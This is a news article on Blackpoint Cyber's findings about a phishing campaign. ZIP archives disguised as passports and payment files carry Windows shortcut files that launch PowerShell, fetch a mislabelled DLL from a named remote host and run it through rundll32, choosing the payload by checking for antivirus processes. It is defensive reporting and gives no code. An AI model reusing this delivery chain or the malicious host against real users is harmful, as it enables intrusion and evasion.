A new wave of phishing attacks has been detected by the cybersecurity research firm, Blackpoint Cyber, that is exploiting users’ trust in sensitive documents. This research, shared with Hackread.com, reveals a campaign that uses identity-themed phishing archives.
These include fake certified documents, passport scans, and payment files, to deliver malicious code. By leveraging familiar file themes, the attackers increase their chances of success and gain initial access to victims’ systems.
In one case examined for this research, a custom-designed spear phishing message was delivered as a ZIP archive, specifically targeting a senior employee or manager with files mimicking routine executive workflows, including identity verification and payment approvals.
How a simple click can become a security nightmare
The attack begins when a victim receives what looks like a normal but important ZIP file. Inside, the documents are actually malicious Windows shortcut files (known as .lnk files). When an unsuspecting user clicks on one of these shortcuts, it silently triggers a hidden program in the background, called PowerShell.
The Blackpoint Security Operations Center (SOC) team observed this script instantly download a disguised payload from a remote web address (hp05.com/gwt/). To avoid raising suspicion, this downloaded file is cleverly named to look like a PowerPoint presentation; however, it is saved on the user’s computer as a harmful DLL file, which researchers have identified as “deliberately mislabelled.”
Attackers ‘Living Off the Land’
Once the file is on the user’s computer, the attacker uses a regular Windows feature, a program called rundll32.exe, to run the malware. For your information, the operating system generally uses this tool for legitimate tasks, but in this case, the attackers “use a signed Windows binary to run attacker code under user context,” according to Blackpoint Cyber’s investigation.
This tactic is called ‘living off the land’ (using built-in system tools), and here it is used to make the malicious activity look like normal Windows operations, helping it bypass many security tools.
The dropper’s most interesting feature is its sneaky Anti-Virus (AV) check. It literally checks for popular security programs like AVG, Avast, and Bitdefender (by looking for processes like avgui or bdagent). This allows it to choose the right malicious file (BD3V.ppt if AV is present, or NORVM.ppt if not), effectively giving it the perfect evasion plan against common security products.
Simply Put:
Using a Windows shortcut file to spread malware is not new, as attackers have been abusing this feature for years to trick users into launching malicious code. What makes the latest campaign notable is how these shortcuts are packaged and delivered.
Instead of obvious executables, the malware is hidden inside ZIP archives disguised as sensitive documents. This multi-stage approach of social engineering with a familiar technique makes the attack far more convincing, while added features like antivirus detection and use of built-in Windows tools allow it to bypass common security controls.
To protect yourself, please avoid running shortcut files casually. Organisations are urged to implement policies that prohibit the execution of shortcut files and monitor how programs like PowerShell and rundll32.exe operate.
